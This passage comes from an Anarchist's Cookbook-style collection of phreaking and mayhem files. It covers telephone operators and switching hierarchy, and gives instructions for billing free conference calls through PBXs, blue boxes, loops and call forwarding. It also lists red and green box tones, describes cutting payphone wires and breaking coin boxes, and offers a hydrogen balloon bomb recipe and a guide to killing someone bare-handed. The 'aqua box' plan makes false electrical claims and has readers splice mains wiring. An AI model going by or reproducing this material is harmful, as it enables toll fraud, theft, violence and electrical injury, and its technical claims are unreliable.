these "gateway cities". They are:
182 - White Plains, NY
183 -
New York, NY
184 - Pittsburgh, PA
185 - Orlando, Fl
186 - Oakland,
CA
187 - Denver, CO
188 - New York, NY
The 18X series are
operator routing codes for overseas access (to be furthur discussed with blue
boxes). All international calls use a signaling service called CCITT.It is
an international standard
for signaling.
Ok.. there you go for now!
If you wanna read more about this, read part two which is the next file #36
in the Jolly Roger's cookbook! -Exodus-
Index
Phone Systems Tutorial part II by The Jolly Roger
Part II will deal with the various types of operators, office heirarchy,
& switching equipment.
Operators
There are many types of
operators in the network and the more common ones will be discussed.
TSPS Operator:
The TSPS [(Traffic Service Position System) ass
opposed to This Shitty Phone Service] Operator is
probably the bitch (or
bastard, for the female libertationists out there) that most of us are used to
having to deal with. Here are his/her responsibilities:
1) Obtaning
billing information for calling card or third number calls
2)
Identifying called customer on person-to-person calls.
3) Obtaining
acceptance of charges on collect calls.
4) Identifying calling numbers.
This only happens when the calling # is not automatically recorded by
CAMA
(Centralized Automatic Message Accounting) & forwarded from the local
office. This could be
caused by equipment failures (ANIF- Automatic Number
Identification Failure) or if the office is not
equipped for CAMA (ONI-
Operator Number Identification).
I once has an equipment failure happen
to me & the TSPS operator came on and said, "What # are you
calling
FROM?" Out of curiosity, I gave her the number to my CO, she thanked me &
then I was connected
to a conversation that appeared to be between a
frameman & his wife. Then it started ringing the party
I wanted to
originally call & everyone phreaked out (excuse the pun). I immediately
dropped this dual
line conference!
You should not mess with the TSPS
operator since she KNOWS which number that you are calling from.
Your number
will show up on a 10-digit LED read-out (ANI board). She also knows whether or
not you are
at a fortress phone & she can trace calls quite readily! Out
of all of the operators, she is one of
the MOST DANGEROUS.
INWARD
operator:
This operator assists your local TSPS ("0") operatorin
connecting calls. She will never question a
call as long as the call is
withing HER SERVICE AREA. She can only be reached via other operators or
by
a blue box. From a blue box, you would dial KP+NPA+121+ST for the INWARD
operator that will help
you connect any calls within that NPA only. (Blue
Boxing will be discussed in a future file).
DIRECTORY ASSISTANCE
Operator:
This is the operator that you are connected to when you dial:
411 or NPA-555-1212. She does not
readily know where you are calling from.
She does not have access to unlisted numbers, but she DOES
know if an
unlisted # exists for a certain listing.
There is also a directory
assistance operator for deaf people who use teletypewriters. If your modem
can transfer BAUDOT [(45.5 baud). One modem that I know of that will do this
is the Apple Cat acoustic
or the Atari 830 acoustic modem. Yea I know they
are hard to find... but if you wanna do this.. look
around!) then you can
call him/her up and have an interesting conversation. The # is: 800-855-1155.
They use the standard Telex abbreviations such as GA for go ahead. they tend
to be nicer and will talk
longer than your regular operators. Also, they are
more vulnerable into being talked out of
information through the process of
"social engineering" as Chesire Catalyst would put it.
Unfortunately,
they do not have access to much. I once bullshitted with one of these operators
a while
back and I found out that there are 2 such DA offices that handle
TTY. One is in Philadelphia and the
other is in California. They have
approx. 7 operators each. most of the TTY operators think that their
job is
boring (based on an official "BIOC poll"). They also feel that they are
under-paid. They
actually call up a regular DA # to process your request
(sorry, no fancy computers!)
Other operators have access to their own DA
by dialing KP+NPA+131+ST (MF).
CN/A operators:
CN/A Operators
are operators that do exactly the opposite of what directory assistance
operators are
for. In my experience, these operators know more than the DA
op's do & they are more susceptable to
"social engeneering." It is
possible to bullshit a CN/A operator for the NON-PUB DA # (ie, you give
them
the name & they give you the unlisted number. See the article on unlisted
numbers in this
cookbook for more info about them.). This is due to the fact
that they assume that you are a fellow
company employee. Unfortunately, the
AT&T breakup has resulted in the break-up of a few NON-PUB DA #'s
and
policy changes in CN/A
INTERCEPT Operator:
The intercept
operator is the one that you are connected to when there are notenough
recordings
available to tell you that the # has been disconnected or
changed. She usually says, "What # you
callin'?" with a foreign accent. This
is the lowest operator lifeform. Even though they don't know
where you are
calling from, it is a waste or your time to try to verbally abuse them since
they
usually understand very little English anyway.
Incidentally, a
few area DO have intelligent INTERCEPT Operators.
OTHER Operators:
And then there are the: MObile, Ship-to-Shore, Conference, Marine
Verify, "Leave Word and Call Back,"
Rout & Rate (KP+800+141+1212+ST),
& other special operators who have one purpose or another in the
network.
Problems with an Operator Ask to speak to their
supervisor... or better yet the Group Chief (who is
the highest ranking
official in any office) who is the equivalent of the Madame ina whorehouse.
By the way, some CO's that willallow you to dial a 0 or 1 as the 4th
digit, will also allow you to
call special operators & other fun Tel.
Co. #'s without a blue box. This is ver rare, though! For
example,212-121-1111 will get you a NY Inward Operator.
Office
Hierarchy
Every switching office in North America (the NPA system), is
assigned an office name and class. There
are five classes of offices
numbered 1 through 5. Your CO is most likely a class 5 or end office. All
long-distance (Toll) calls are switched by a toll office which can be a
class 4, 3, 2, or 1 office.
There is also a class 4X office callen an
intermediate point. The 4X office is a digital one that can
have an
unattended exchange attached to it (known as a Remote Switching Unit (RSU)).
The following chart will list the Office #, name, & how many of
those office exist (to the best of my
knowledge) in North America:
Class
Name Abb # Existing
----- ----------------------- --- -----------------
> 1 Regional Center RC 12
> 2 Sectional Center SC 67
> 3
Primary Center PC 230
> 4 Toll Center TC 1,300
> 4P Toll Point TP
n/a
> 4X Intermediate Point IP n/a
> 5 End Office EO 19,000
> 6 RSU RSU n/a
When connecting a call from one party to another,
the switching equipment usually tries to find the
shortest route between the
class 5 end office of the caller & the class 5 end officeof the called
party. If no inter-office trunks exist between the two parties, it will then
move upward to the next
highest office for servicing calls (Class 4). If the
Class 4 office cannot handle the call by sending
it to another Class 4 or 5
office, it will then be sent to the next highest office in the hierarchy
(3). The switching equipment first uses the high-usage interoffice trunk
groups, if they are busy then
it goes to the fina; trunk groups on the next
highest level. If the call cannot be connected, you will
probably get a
re-order [120 IPM (interruptions per minute) busy signal] signal. At this time,
the
guys at Network Operations are probably shitting in their pants and
trying to avoid the dreaded
Network Dreadlock (as seen on TV!).
It
is also interesting to note that 9 connections in tandem is called
ring-around-the-rosy and it has
never occured in telephone history. This
would cause an endless loop connection [a neat way to really
screw up the
network].
The 10 regional centers in the US & the 2 in Canada are
all interconnected. they form the foundation
of the entire telephone
network. Since there are only 12 of them, they are listed below:
Class 1
Regional Office Location NPA
-------------------------------- ---
Dallas
4 ESS 214
Wayne, PA 215
Denver 4T 303
Regina No. 2SP1-4W (Canada)
306
St. Louis 4T 314
Rockdale, GA 404
Pittsburgh 4E 412
Montreal
No. 1 4AETS (Canada) 504
That's it for now! More info to come Future
update to the Cookbook! Have fun! -Exodus-
Index
Basic Alliance Teleconferencing Courtesy of the Jolly Roger
Introduction: This phile will deal with accessing, understanding and
using the Alliance
Teleconferencing Systems.... it has many sections and for
best use should be printed out...enjoy...
Alliance: Alliance
Teleconferencing is an independant company which allows the general public to
access and use it's conferencing equipment. Many rumors have been floating
apound that Alliance is a
subsidary of AT&T. Well, they are wrong. As
stated above, Alliance is an entirely independant company.
They use
sophisticated equipment to allow users to talk to many people at once.
The Number: Alliance is in the 700 exchange, thus it is not localized,
well, not in a way. Alliance is
only in certain states, and only residents
of these certain states can access by dialing direct. This,
however, will be
discussed in a later chapter. The numbers for alliance are as follows:
0-700-456-1000 (chicago)
-1001 (los angeles)
-1002 (chicago)
-1003 (houston)
-2000 (?)
-2001 (?)
-2002 (?)
-2003 (?)
-3000 (?)
-3001 (?)
-3002 (?)
-3003 (?)
The locations of
the first 4 numbers are known and i have stated them. However, the numbers in
the
200x and 300x are not definately known. Rumor has it that the pattern
repeats itself but this has not
been proven.
Dialing: As stated
before, Alliance is only in certain stated and only these states can access them
via dialing direct. However, dialing direct causes your residence to be
charged for the conference and
conference bills are not low!!! Therefore,
many ways have been discovered to start a conference
without having it
billed to ones house. They are as follows:
1. Dialing through a PBX
2.
Incorporating a Blue Box
3. Billing to a loop
4. Billing to a forwarded
call
I am sure there are many more but these are the four i will deal
with.
Dialing through a PBX: Probably the easiest method of creating a
free conference is through a PBX.
Simply call one in a state that has
Alliance, input the PBX's code, dial 9 for an outside line and
then dial
alliance. An example of this would be:
PBX: 800-241-4911
When it
answers it will give you a tone. At this tone input your code.
Code:
1234
After this you will receive another tone, now dial 9 for an outside
line. You will now hear a dial
tone. Simply dial Alliance from this point
and the conference will be billed to the PBX.
Using a Blue Box: Another
rather simple way of starting a conference is with a Blue Box. The following
procedure is how to box a conference: Dial a number to box off of. In this
example we will use
609-609-6099 When the party answers hit 2600hz. This
will cause the fone company's equipment to think
that you have hung up. You
will hear a You have now 'seized' a trunk. After this, switch to
multi-frequency and dial:
KP-0-700-456-x00x-ST
KP=KP tone on
Blue Box
x=variable between 1 and 3
ST=ST tone on Blue Box
The
equipment now thinks that the operator has dialed Alliance from her switchboard
and the conference
shall be billed there. Since Blue Boxing is such a large
topic, this is as far as I will go into it's
uses.
Billing to a
loop: A third method of receiving a free conference is by billing out to a loop.
A loop
is 2 numbers that when two people call, they can talk to each other.
You're saying woop-tee-do right?
Wrong! Loops can be [very] usefull to
phreaks. First, dial alliance direct. After going through the
beginning
procedure, which will be discussed later in this tutorial, dial 0 and wait for
an Alliance
operator. When she answers tell her you would like to bill the
conference to such and such a number.
(A loop where your phriend is on the
other side) She will then call that number to receive voice
verification. Of
course your phriend will be waiting and will accept the charges. Thus, the
conference
is billed to the loop.
Billing to call forwarding: When
you dial a number that is call forwarded, it is first answered by the
original location, then forwarded. The original location will hang up if
2600hz is received from only
ond end of the line. Therefore, if you were to
wait after the forwarded residence answered, you would
receive the original
location's dial tone.
Example: Dial 800-325-4067
The original
residence would answer, then forward the call, a second type of ringing would be
heard.
When this second residence answers simply wait until they hang up.
After about twenty seconds you will
then receive the original residence's
dial tone since it heard 2600hz from one end of the line. Simply
dial
Alliance from this point and the conference will be billed to the original
residence. These are
the four main ways to receive a free conference. I am
sure many more exist, but these four are quite
handy themselves.
Logon Procedure: Once Alliance answers you will hear a two-tone
combination. This is their way of
saying 'How many people do you want on the
conference dude?' Simply type in a 2-digit combination,
depending on what
bridge of Alliance you are on, between 10 and 59. After this either hit '*' to
cancel the conference size and inout another or hit '#' to continue. You are
now in Alliance
Teleconferencing and are only seconds away from having your
own roaring conference going strong!!!
Dialing in Conferees: To dial
your first conferee, dial 1+npa+pre+suff and await his/her answer.
npa=area code
pre=prefix
suff=suffix
If the number is
busy, or if no one answers simply hit '*' and your call will be aborted. But, if
they
do answer, hit the '#' key. This will add them to the conference. Now
commence dialing other
conferees.
Joining Your Conference: To join
your conference from control mode simply hit the '#' key. Within a
second or
two you will be chatting with all your buddies. To go back into control mode,
simply hit the
'#' key again.
Transferring Control: To transfer
control to another conferee, go into control mode, hit the #
6+1+npa+pre+suff of the conferee you wish to give control to. If after, you
wish to abort this
transfer hit the '*' key.
[note]:Transfer of
control is often not available. When you receive a message stating this, you
simply
cannot transfer control.
Muted Conferences: To request a
muted conference simply hit the 9 key. I am not exactly sure what a
muted
conference is but it is probably a way to keep unwanted eavesdroppers from
listening in.
dialing Alliance Operators: Simply dial 0 as you would
from any fone and wait for the operator to
answer.
Ending Your
Conference: To end your conference all together, that is kick everyone including
yourself
off, go into control mode and hit '*'...after a few seconds simply
hang up. Your conference is over.
Are Alliance Operators Dangerous? No.
Not in the least. The worst they can do to you while you are
having a
conference is drop all conferees including yourself. This is in no way harmful,
just a little
aggravating.
Alliance and Tracing: Alliance can trace,
as all citizens of the United States can. But this has to
all be
pre-meditated and AT&T has to be called and it's really a large hastle,
therefore, it is almost
never done. Alliance simply does not want it known
that teenagers are phucking them over. The only
sort of safety equipment
Alliance has on-line is a simple pen register. This little device simply
records all the numbers of the conferees dialed. No big deal. All Alliance
can do is call up that
persons number, threaten and question. However,
legally, they can do nothing because all you did was
answer your fone.
[note]:Almost all instructions are told to the person in command by
Alliance recordings. A lot of this
tutorial is just a listing of those
commands plus information gathered by either myself or the phellow
phreaks
of the world!!!
(written by the Trooper)
In the CookBook 4! -=
Exodus =-
Index
Aqua Box Plans by Jolly Roger
Every true phreaker lives in fear of the dreadded F.B.I. 'Lock In
Trace.' For a long time, it was
impossible to escape from the Lock In Trace.
This box does offer an escape route with simple
directions to it. This box
is quite a simple concept, and almost any phreaker with basic electronics
knowledge can construct and use it.
The Lock In Trace
A lock
in trace is a device used by the F.B.I. to lock into the phone users location so
that he can
not hang up while a trace is in progress. For those of you who
are not familiar with the conecpt of
'locking in', then here's a brief
desciption. The F.B.I. can tap into a conversation, sort of like a
three-way
call connection. Then, when they get there, they can plug electricity into the
phone line.
All phone connections are held open by a certain voltage of
electricity.
That is why you sometimes get static and faint connections when
you are calling far away, because the
electricity has trouble keeping the
line up. What the lock in trace does is cut into the line and
generate that
same voltage straight into the lines. That way, when you try and hang up,
voltage is
retained. Your phone will ring just like someone was calling you
even after you hang up. (If you have
call waiting, you should understand
better about that, for call waiting intersepts the electricity and
makes a
tone that means someone is going through your line. Then, it is a matter of
which voltage is
higher. When you push down the receiver,then it see-saws
the electricity to the other side. When you
have a person on each line it is
impossible to hang up unless one or both of them will hang up.
If you try to
hang up, voltage is retained, and your phone will ring. That should give you an
understanding of how calling works. Also, when electricity passes through a
certain point on your
phone, the electricity causes a bell to ring, or on
some newer phones an electronic ring to sound.)
So, in order to eliminate
the trace, you somehow must lower the voltage level on your phone line. You
should know that every time someone else picks up the phone line, then the
voltage does decrease a
little. In the first steps of planning this out,
Xerox suggested getting about a hundred phones all
hooked into the same line
that could all be taken off the hook at the same time. That would greatly
decrease the voltage level. That is also why most three-way connections that
are using the bell
service three way calling (which is only $3 a month)
become quite faint after a while. By now, you
should understand the basic
idea. You have to drain all of the power out of the line so the voltage
can
not be kept up. Rather sudden draining of power could quickly short out the
F.B.I. voltage
machine, because it was only built to sustain the exact
voltage nessecary to keep the voltage out. For
now, imagine this. One of the
normal Radio Shack generators that you can go pick up that one end of
the
cord that hooks into the central box has a phone jack on it and the other has an
electrical plug.
This way, you can "flash" voltage through the line, but
cannot drain it. So, some modifications have
to be done.
Materials
* A BEOC (Basic Electrical Output Socket), like a small lamp-type
connection, where you just have a
simple plug and wire that would plug into
a light bulb.
* One of cords mentioned above, if you can't find one then
construct your own... Same voltage
connection, but the restrainor must be
built in (I.E. The central box)
* Two phone jacks (one for the modem, one
for if you are being traced to plug the aqua box into)
Some creativity and
easy work.
*Notice: No phones have to be destroyed/modified to make this
box, so don't go out and buy a new phone
for it!
Procedure
All right, this is a very simple procedure. If you have the BEOC, it
could drain into anything: a
radio, or whatever. The purpose of having that
is you are going to suck the voltage out from the phone
line into the
electrical appliance so there would be no voltage left to lock you in with.
1)Take the connection cord. Examine the plug at the end. It should have
only two prongs. If it has
three, still, do not fear. Make sure the
electrical appliance is turned off unless you wanna become a
crispy critter
while making this thing. Most plugs will have a hard plastic design on the top
of them
to prevent you from getting in at the electrical wires inside.
Well, remove it. If you want to keep the plug (I don't see why...) then just
cut the top off. When you
look inside, Lo and Behold, you will see that at
the base of the prongs there are a few wires
connecting in. Those wires
conduct the power into the appliance.
So, you carefully unwrap those from
the sides and pull them out until they are about an inch ahead of
the
prongs. If you don't wanna keep the jack, then just rip the prongs out. If you
are, cover the
prongs with insultation tape so they will not connect with
the wires when the power is being drained
from the line.
2)Do the
same thing with the prongs on the other plug, so you have the wires evenly
connected. Now,
wrap the end of the wires around each other.
If you
happen to have the other end of the voltage cord hooked into the phone, stop
reading now,
you're too fucking stupid to continue. After you've wrapped the
wires around each other, then cover
the whole thing with the plugs with
insulating tape. Then, if you built your own control box or if you
bought
one, then cram all the wires into it and reclose it. That box is your ticket out
of this.
3)Re-check everything to make sure it's all in place. This is a
pretty flimsy connection, but on later
models when you get more experienced
at it then you can solder away at it and form the whole device
into one big
box, with some kind of cheap mattel hand-held game inside to be the power
connector. In
order to use it, just keep this box handy.
Plug it into
the jack if you want, but it will slightly lower the voltage so it isn't
connected. When
you plug it in, if you see sparks, unplug it and restart the
whole thing. But if it just seems fine
then leave it.
Use
Now, so you have the whole thing plugged in and all... Do not use this
unless the situation is
desperate! When the trace has gone on, don't panic,
unplug your phone, and turn on the appliance that
it was hooked to. It will
need energy to turn itself on, and here's a great source...
The voltage to
keep a phone line open is pretty small and a simple light bulb should drain it
all in
and probably short the F.B.I. computer at the same time.
Happy boxing and stay free! ------------Exodus
Index
Hindenberg Bomb by the Jolly Roger
Needed:
* 1 Balloon
* 1 Bottle
* 1 Liquid Plumr
* 1
Piece Aluminum FoilL
* 1 Length Fuse
Fill the bottle 3/4 full with
Liquid Plumr and add a little piece of aluminum foil to it. Put the
balloon
over the neck of the bottle until the balloon is full of the resulting gas. This
is highly
flammable hydrogen.
Now tie the baloon. Now light the fuse,
and let it rise. When the fuse contacts the balloon, watch
out!!!
Index
-------[=How to Kill Someone==]------------[=WITH YOUR BARE
HANDS=]-----
AN EXCERPT FROM THE ANARCHISTS COOKBOOK II.....
Courtesy of Exodus
This file will explain the basics of hand-to-hand combat, and will tell
of the best places to strike
and kill an enemy...
When engaged in
hand-to-hand combat, your life is always at stake. There is only one purpose in
combat, and that is to kill your enemy. Never face an enemy with the idea of
knocking him out.
The chances are extremely good that he will kill YOU
instead. When a weapon is not available, one must
resort to the full use of
his natural weapons. The natural weapons are:
* The knife edge of your
hands.
* Fingers folded at the second joint or knuckle.
* The protruding
knuckle of your second finger.
* The heel of your hand.
* Your boot
* Elbows
* Knees
* and Teeth.
Attacking is a primary factor.
A fight was never won by defensive action. Attack with all of your
strength.
At any point or any situation, some vulnerable point on your enemies body will
be open for
attack. Do this while screaming as screaming has two purposes.
1.To frighten and confuse your enemy.
2.To allow you to take a deep
breath which, in turn, will put more oxygen in your blood stream. Your
balance and balance of your enemy are two inportant factors; since, if you
succeed in making your
enemy lose his balance, the chances are nine to one
that you can kill him in your next move. The best
over-all stance is where
your feet are spread about shoulders width apart, with your right foot about
a foot ahead of the left. Both arms should be bent at the elbows parallel to
each other. Stand on the
balls of your feet and bend your waist slightly.
Kinda of like a boxer's crouch. Employing a sudden
movement or a scream or
yell can throw your enemy off-balance. There are many vulnerable points of the
body. We will cover them now:
Eyes:Use your fingers in a V-shape and
attack in gouging motion.
Nose:(Extremely vulnerable) Strike with the
knife edge of the hand along the bridge, which will cause
breakage, sharp
pain, temporary blindness, and if the blow is hard enough, death. Also, deliver
a blow
with the heel of your hand in an upward motion, this will shove the
bone up into the brain causing
death.
Adam's Apple: This spot is
usually pretty well protected, but if you get the chance, strike hard with
the knife edge of your hand. This should sever the wind-pipe, and then it's
all over in a matter of
minutes.
Temple: There is a large artery up
here, and if you hit it hard enough, it will cause death. If you
manage to
knock your enemy down, kick him in the temple, and he'll never get up again.
Back of the Neck: A rabbit punch, or blow delivered to the base of the
neck can easily break it, but
to be safe, it is better to use the butt of a
gun or some other heavy blunt object.
Upper lip: A large network of
nerves are located. These nerves are extrememly close to the skin. A
sharp
upward blow will cause extreme pain, and unconciosness.
Ears: Coming up
from behind an enemy and cupping the hands in a clapping motion over the victims
ears
can kill him immediately. The vibrations caused from the clapping
motion will burst his eardrums, and
cause internal bleeding in the brain.
Groin: A VERY vulnerable spot. If left open, get it with knee hard, and
he'll buckle over very fast.
Kidneys: A large nerve that branches off to
the spinal cord comes very close to the skin at the
kidneys. A direct blow
with the knife edge of your hand can cause death.
There are many more
ways to kill and injure an enemy, but these should work best for the average
person. This is meant only as information and I would not recommend that you
use this for a simple
High School Brawl. Use these methods only, in your
opinion, if your life is in danger. Any one of
these methods could very
easily kill or cause permanent damage to someone. One more word of caution,
you should practice these moves before using them on a dummy, or a mock
battle with a friend. (You
don't have to actually hit him to practice, just
work on accuracy.)
Index
Phone Systems Tutorial III by The Jolly Roger
PREFACE:
THIS ARTICLE WILL FOCUS PRIMARILY ON THE STANDARD
WESTERN ELECTRIC SINGLE- SLOT COIN TELEPHONE (AKA
FORTRESS FONE) WHICH CAN
BE DIVIDED INTO 3 TYPES:
- DIAL-TONE FIRST (DTF)
- COIN-FIRST (CF): (IE,
IT WANTS YOUR $ BEFORE YOU RECEIVE A DIAL TONE)
- DIAL POST-PAY SERVICE
(PP): YOU PAYAFTER THE PARTY ANSWERS
DEPOSITING COINS (SLUGS):
------------------------- ONCE YOU HAVE DEPOSITED YOUR SLUG INTO A FORTRESS,
IT IS SUBJECTED TO A GAMUT OF TESTS. THE FIRST OBSTACAL FOR A SLUG IS THE
MAGNETIC TRAP. THIS WILL
STOP ANY LIGHT-WEIGHT MAGNETIC SLUGS AND COINS. IF
IT PASSES THIS, THE SLUG IS THEN CLASSIFIED AS A
NICKEL, DIME, OR QUARTER.
EACH SLUG IS THEN CHECKED FOR APPROPRIATE SIZE AND WEIGHT. IF THESE TESTS
ARE PASSED, IT WILL THEN TRAVEL THROUGH A NICKEL, DIME, OR QUARTER MAGNET AS
APPROPRIATE. THESE
MAGNETS SET UP AN EDDY CURRENT EFFECT WHICH CAUSES COINS
OF THE APPROPRIATE CHARACTERISTICS TO SLOW
DOWN SO THEY WILL FOLLOW THE
CORRECT TRAJECTORY. IF ALL GOES WELL, THE COIN WILL FOLLOW THE CORRECT
PATH
(SUCH AS BOUNCING OFF OF THE NICKEL ANVIL) WHERE IT WILL HOPEFULLY FALL INTO THE
NARROW ACCEPTED
COIN CHANNEL.
THE RATHER ELABORATE TESTS THAT ARE
PERFORMED AS THE COIN TRAVELS DOWN THE COIN CHUTE WILL STOP MOST
SLUGS AND
OTHER UNDESIRABLE COINS, SUCH AS PENNIES, WHICH MUST THEN BE RETRIEVED USING THE
COIN
RELEASE LEVER. IF THE SLUG MIRACULOUSLY SURVIVES THE GAMUT, IT WILL
THEN STRIKE THE APPROPRIATE
TOTALIZER ARM CAUSING A RATCHET WHEEL TO ROTATE
ONCE FOR EVERY 5-CENT INCREMENT (EG, A QUARTER WILL
CAUSE IT TO ROTATE 5
TIMES).
THE TOTALIZER THEN CAUSES THE COIN SIGNAL OSCILLATOR TO READOUT A
DUAL- FREQUENCY SIGNAL INDICATING
THE VALUE DEPOSITED TO ACTS (A COMPUTER)
OR THE TSPS OPERATOR. THESE ARE THE SAME TONES USED BY
PHREAKS IN THE
INFAMOUS RED BOXES. FOR A QUARTER, 5 BEEP TONES ARE OUTPULSED AT 12-17 PULSES
PER
SECOND (PPS). A DIME CAUSES 2 BEEP TONES AT 5 - 8.5 PPS WHILE A NICKEL
CAUSES ONE BEEP TONE AT 5 - 8.5
PPS. A BEEP CONSISTS OF 2 TONES: 2200 + 1700
HZ. A RELAY IN THE FORTRESS CALLED THE "B RELAY" (YES,
THERE IS ALSO AN 'A
RELAY') PLACES A CAPACITOR ACROSS THE SPEECH CIRCUIT DURING TOTALIZER READOUT TO
PREVENT THE "CUSTOMER" FROM HEARING THE RED BOX TONES. IN OLDER 3 SLOT
PHONES: ONE BELL (1050-1100 HZ)
FOR A NICKEL, TWO BELLS FOR A DIME, AND ONE
GONG (800 HZ) FOR A QUARTER ARE USED INSTEAD OF THE MODERN
DUAL-FREQUENCY
TONES.
============= =TSPS & ACTS= =============
WHILE
FORTRESSES ARE CONNECTED TO THE CO OF THE AREA, ALL TRANSACTIONS ARE HANDLED VIA
THE TRAFFIC
SERVICE POSITION SYSTEM (TSPS). IN AREAS THAT DO NOT HAVE ACTS,
ALL CALLS THAT REQUIRE OPERATOR
ASSISTANCE, SUCH AS CALLING CARD AND
COLLECT, ARE AUTOMATICALLY ROUTED TO A TSPS OPERATOR POSITION. IN
AN EFFORT
TO AUTOMATE FORTRESS SERVICE, A COMPUTER SYSTEM KNOWN AS AUTOMATED COIN TOLL
SERVICE (ACTS)
HAS BEEN IMPLEMENTED IN MANY AREAS. ACTS LISTENS TO THE RED
BOX SIGNALS FROM THE FONES AND TAKES
APPROPRIATE ACTION. IT IS ACTS WHICH
SAYS, "TWO DOLLARS PLEASE (PAUSE) PLEASE DEPOSIT TWO DOLLARS FOR
THE NEXT
TEN SECONDS" (AND OTHER VARIATIONS). ALSO, IF YOU TALK FOR MORE THAN THREE
MINUTES AND THEN
HANG-UP, ACTS WILL CALL BACK AND DEMAND YOUR MONEY. ACTS IS
ALSO RESPONSIBLE FOR AUTOMATED CALLING
CARD SERVICE. ACTS ALSO PROVIDE
TROUBLE DIAGNOSIS FOR CRAFTSPEOPLE (REPAIRMEN SPECIALIZING IN
FORTRESSES).
FOR EXAMPLE, THERE IS A COIN TEST WHICH IS GREAT FOR TUNING UP RED BOXES. IN
MANY AREAS
THIS TEST CAN BE ACTIVATED BY DIALING 09591230 AT A FORTRESS
(THANKS TO KARL MARX FOR THIS
INFORMATION). ONCE ACTIVATED IT WILL REQUEST
THAT YOU DEPOSIT VARIOUS COINS. IT WILL THEN IDENTIFY THE
COIN AND OUTPULSE
THE APPROPRIATE RED BOX SIGNAL. THE COINS ARE USUALLY RETURNED WHEN YOU HANG UP.
TO MAKE SURE THAT THERE IS ACTUALLY MONEY IN THE FONE, THE CO INITIATES A
"GROUND TEST" AT VARIOUS
TIMES TO DETERMINE IF A COIN IS ACTUALLY IN THE
FONE. THIS IS WHY YOU MUST DEPOSIT AT LEAST A NICKEL
IN ORDER TO USE A RED
BOX!
GREEN BOXES:
PAYING THE INITIAL RATE IN ORDER TO USE A RED
BOX (ON CERTAIN FORTRESSES) LEFT A SOUR TASTE IN MANY
RED BOXER'S MOUTHS
THUS THE GREEN BOX WAS INVENTED. THE GREEN BOX GENERATES USEFUL TONES SUCH AS
COIN
COLLECT, COIN RETURN, AND RINGBACK. THESE ARE THE TONES THAT ACTS OR
THE TSPS OPERATOR WOULD SEND TO
THE CO WHEN APPROPRIATE. UNFORTUNATELY, THE
GREEN BOX CANNOT BE USED AT A FORTRESS STATION BUT IT MUST
BE USED BY THE
CALLED PARTY.
HERE ARE THE TONES:
COIN COLLECT 700 + 1100 HZ
COIN RETURN 1100 + 1700 HZ
RINGBACK 700 + 1700 HZ
BEFORE THE CALLED
PARTY SENDS ANY OF THESE TONES, AN OPERATOR RELEASED SIGNAL SHOULD BE SENT TO
ALERT
THE MF DETECTORS AT THE CO. THIS CAN BE ACCOMPLISHED BY SENDING 900 +
1500 HZ OR A SINGLE 2600 HZ WINK
(90 MS) FOLLOWED BY A 60 MS GAP AND THEN
THE APPROPRIATE SIGNAL FOR AT LEAST 900 MS. ALSO, DO NOT
FORGET THAT THE
INITIAL RATE IS COLLECTED SHORTLY BEFORE THE 3 MINUTE PERIOD IS UP.
INCIDENTALLY, ONCE
THE ABOVE MF TONES FOR COLLECTING AND RETURNING COINS
REACH THE CO, THEY ARE CONVERTED INTO AN
APPROPRIATE DC PULSE (-130 VOLTS
FOR RETURN & +130 VOLTS FOR COLLECT). THIS PULSE IS THEN SENT DOWN
THE
TIP TO THE FORTRESS. THIS CAUSES THE COIN RELAY TO EITHER RETURN OR COLLECT THE
COINS. THE ALLEGED
"T-NETWORK" TAKES ADVANTAGE OF THIS INFORMATION. WHEN A
PULSE FOR COIN COLLECT (+130 VDC) IS SENT DOWN
THE LINE, IT MUST BE GROUNDED
SOMEWHERE. THIS IS USUALLY EITHER THE YELLOW OR BLACK WIRE. THUS, IF THE
WIRES ARE EXPOSED, THESE WIRES CAN BE CUT TO PREVENT THE PULSE FROM BEING
GROUNDED. WHEN THE THREE
MINUTE INITIAL PERIOD IS ALMOST UP, MAKE SURE THAT
THE BLACK & YELLOW WIRES ARE SEVERED; THEN HANG UP,
WAIT ABOUT 15
SECONDS IN CASE OF A SECOND PULSE, RECONNECT THE WIRES, PICK UP THE FONE, HANG
UP AGAIN,
AND IF ALL GOES WELL IT SHOULD BE "JACKPOT" TIME.
PHYSICAL
ATTACK:
A TYPICAL FORTRESS WEIGHS ROUGHLY 50 LBS. WITH AN EMPTY COIN
BOX. MOST OF THIS IS ACCOUNTED FOR IN THE
ARMOR PLATING. WHY ALL THE
SECURITY? WELL, BELL CONTRIBUTES IT TO THE FOLLOWING: "SOCIAL CHANGES
DURING
THE 1960'S MADE THE MULTISLOT COIN STATION A PRIME TARGET FOR: VANDALISM, STRONG
ARM ROBBERY,
FRAUD, AND THEFT OF SERVICE. THIS BROUGHT ABOUT THE
INTRODUCTION OF THE MORE RUGGED SINGLE SLOT COIN
STATION AND A NEW
ENVIRONMENT FOR COIN SERVICE." AS FOR PICKING THE LOCK, I WILL QUOTE MR. PHELPS:
"WE
OFTEN FANTASIZE ABOUT 'PICKING THE LOCK' OR 'GETTING A MASTER KEY.'
WELL, YOU CAN FORGET ABOUT IT. I
DON'T LIKE TO DISCOURAGE PEOPLE, BUT IT
WILL SAVE YOU FROM WASTING ALOT OF OUR TIME--TIME WHICH CAN BE
PUT TO BETTER
USE (HEH, HEH)." AS FOR PHYSICAL ATTACK, THE COIN PLATE IS SECURED ON ALL FOUR
SIDE BY
HARDENED STEEL BOLTS WHICH PASS THROUGH TWO SLOTS EACH. THESE BOLTS
ARE IN TURN INTERLOCKED BY THE
MAIN LOCK. ONE PHREAK I KNOW DID MANAGE TO
TAKE ONE OF THE 'MOTHERS' HOME (WHICH WAS ATTACHED TO A
PIECE OF PLYWOOD AT
A CONSTRUCTION SITE; OTHERWISE, THE PERMANENT ONES ARE A BITCH TO DETACH FROM
THE
WALL!). IT TOOK HIM ALMOST TEN HOURS TO OPEN THE COIN BOX USING A POWER
DRILL, SLEDGE HAMMERS, AND
CROW BARS (WHICH WAS EMPTY -- PERHAPS NEXT TIME,
HE WILL DEPOSIT A COIN FIRST TO HEAR IF IT SLUSHES
DOWN NICELY OR HITS THE
EMPTY BOTTOM WITH A CLUNK.) TAKING THE FONE OFFERS A HIGHER MARGIN OF SUCCESS.
ALTHOUGH THIS MAY BE DIFFICULT OFTEN REQUIRING BRUTE FORCE AND THERE HAS
BEEN SEVERAL CASES OF BACK
AXLES BEING LOST TRYING TO TAKE DOWN A FONE! A
QUICK AND DIRTY WAY TO OPEN THE COIN BOX IS BY USING A
SHOTGUN. IN DETROIT,
AFTER ECOLOGISTS CLEANED OUT A MUNICIPAL POND, THEY FOUND 168 COIN PHONE RIFLED.
